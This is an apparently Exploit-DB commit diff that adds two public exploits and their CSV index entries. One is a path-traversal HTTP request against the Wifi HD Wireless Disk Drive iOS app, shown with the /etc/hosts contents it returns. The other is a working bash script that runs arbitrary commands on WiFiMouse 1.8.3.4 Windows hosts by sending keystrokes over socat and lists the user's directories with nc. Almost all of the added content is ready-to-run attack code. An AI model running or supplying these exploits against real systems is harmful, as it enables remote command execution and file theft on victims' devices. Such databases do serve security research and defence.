DB: 2022-09-22

2 changes to exploits/shellcodes Wifi HD Wireless Disk Drive 11 - Local File Inclusion WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
2022-09-22 05:01:51 +00:00 · 2022-09-22 05:01:51 +00:00 · 3d2fa2f00a
commit 3d2fa2f00a
parent 7cbe771564
3 changed files with 104 additions and 0 deletions
--- a/exploits/ios/remote/51015.txt
+++ b/exploits/ios/remote/51015.txt
@ -0,0 +1,39 @@
+# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
+# Date: Aug 13, 2022
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: http://www.savysoda.com
+# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
+# Version: 11
+# Tested on: iPhone OS 15_5
+
+# Proof of Concept
+GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
+Host: 192.168.1.100
+Connection: close
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
+AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5  Safari/604.1
+Referer: http://192.168.1.103/
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Accept-Encoding: gzip, deflate
+
+
+-----------------
+
+HTTP/1.1 200 OK
+Content-Disposition: attachment
+Content-Type: application/download
+Content-Length: 213
+Accept-Ranges: bytes
+Date: Sat, 13 Aug 2022 03:33:30 GMT
+
+##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting.  Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1             localhost
--- a/exploits/windows/remote/51016.sh
+++ b/exploits/windows/remote/51016.sh
@ -0,0 +1,63 @@
+# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
+# Date: 15-08-2022
+# Author: Febin
+# Vendor Homepage: http://necta.us/
+# Software Link: http://wifimouse.necta.us/#download
+# Version: 1.8.3.4
+# Tested on: Windows 10
+
+#!/bin/bash
+printf "
+  WiFiMouse / MouseServer 1.8.3.4 Exploit
+
+            by FEBIN
+
+"
+
+printf "[*] Enter the Target IP Address: "
+read TARGET
+
+
+
+rce(){
+printf "[*] Enter the Command to execute on the Target:  "
+read CMD
+
+sh -c "echo 'key  9[R] WIN d';sleep 1;echo 'key  9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
+}
+
+dirlist(){
+
+echo "[*] User's Home Directory Contents:"
+
+echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-
+
+while $true
+do
+printf "\nList Directory:> "
+read DIR
+echo "[+] Contents of $DIR: "
+echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
+done
+
+
+}
+
+printf "
+ [1] Remote Command Execution
+ [2] Directory Listing
+
+ "
+printf "Enter Your Choice (1 or 2) : "
+read CHOICE
+
+if [[ $CHOICE == "1" ]]
+then
+rce
+elif [[ $CHOICE == "2" ]]
+then
+dirlist
+
+else
+echo "[-] Invalid Choice!"
+fi
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -18725,6 +18725,8 @@ id,file,description,date,author,type,platform,port
 51005,exploits/multiple/remote/51005.py,"PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UnD3sc0n0c1d0,remote,multiple,
 51010,exploits/windows/remote/51010.py,"Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)",1970-01-01,"Chokri Hammedi",remote,windows,
 51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux,
+51015,exploits/ios/remote/51015.txt,"Wifi HD Wireless Disk Drive 11 - Local File Inclusion",1970-01-01,"Chokri Hammedi",remote,ios,
+51016,exploits/windows/remote/51016.sh,"WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,